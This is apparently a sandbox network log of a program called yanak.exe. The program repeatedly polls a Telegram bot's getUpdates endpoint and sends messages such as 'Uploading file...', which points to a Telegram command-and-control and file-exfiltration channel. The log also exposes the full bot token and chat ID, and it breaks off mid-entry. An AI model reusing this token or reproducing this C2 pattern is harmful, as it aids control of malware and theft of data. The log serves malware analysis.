Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:12 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293324

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293324 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:13 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293325

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293325 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:14 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293326

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293326 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:15 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293327

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293327 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:16 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293328

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293328 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:17 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293329

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293329 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:18 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293330

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293330 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:19 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293331

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293331 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:20 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293332

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293332 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:21 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293333

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293333 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:22 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293334

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293334 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:23 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293335

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293335 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:25 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293336

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293336 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:26 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293337

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293337 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:27 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293338

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293338 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:28 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293339

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293339 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:29 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293340

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293340 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:30 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293341

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293341 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:31 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293342

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293342 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:32 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293343

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293343 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:33 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293344

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293344 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:34 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293345

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293345 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:35 GMT
Content-Type: application/json
Content-Length: 357
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293323

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293323 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:36 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/sendMessage?chat_id=5569740835&text=%F0%9F%93%83%20Uploading%20file...

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/sendMessage?chat_id=5569740835&text=%F0%9F%93%83%20Uploading%20file... HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:36 GMT
Content-Type: application/json
Content-Length: 266
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293324

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293324 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:37 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293325

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293325 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:38 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293326

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293326 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:39 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293327

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293327 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:40 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293328

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293328 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:42 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293329

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293329 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:43 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293330

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293330 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:44 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293331

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293331 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:45 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293332

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293332 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:46 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293333

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293333 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:47 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293334

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293334 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:48 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293335

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293335 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:49 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293336

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293336 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:50 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293337

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293337 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:51 GMT
Content-Type: application/json
Content-Length: 355
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/sendMessage?chat_id=5569740835&text=%F0%9F%93%A1%20Unknown%20command

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/sendMessage?chat_id=5569740835&text=%F0%9F%93%A1%20Unknown%20command HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:51 GMT
Content-Type: application/json
Content-Length: 264
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293324

yanak.exe

Remote address:

149.154.167.220:443

Request

GET /bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293324 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 04 Dec 2024 16:27:52 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7584205709:AAHSbORjgixKBL3e_gW4a2nQGHA1HBwJVqY/getUpdates?offset=870293325

yanak.exe

Remote address:

149.154.167.220:443

Request

